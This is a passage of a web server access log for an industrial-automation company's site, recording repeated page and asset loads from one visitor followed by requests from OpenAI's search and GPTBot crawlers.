"https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:21:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10413] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:22:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10413] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:30:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:38:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 74.7.228.62] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:23:43:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 74.7.243.250] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" -[17/Feb/2026:23:43:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.243.250] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 74.7.243.250] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 74.7.243.250] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 74.7.243.250] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 74.7.243.250] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 74.7.243.250] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 74.7.243.250] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 74.7.243.250] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 74.7.243.250] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.243.250] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:43:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 74.7.243.250] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:44:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 74.7.243.250] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 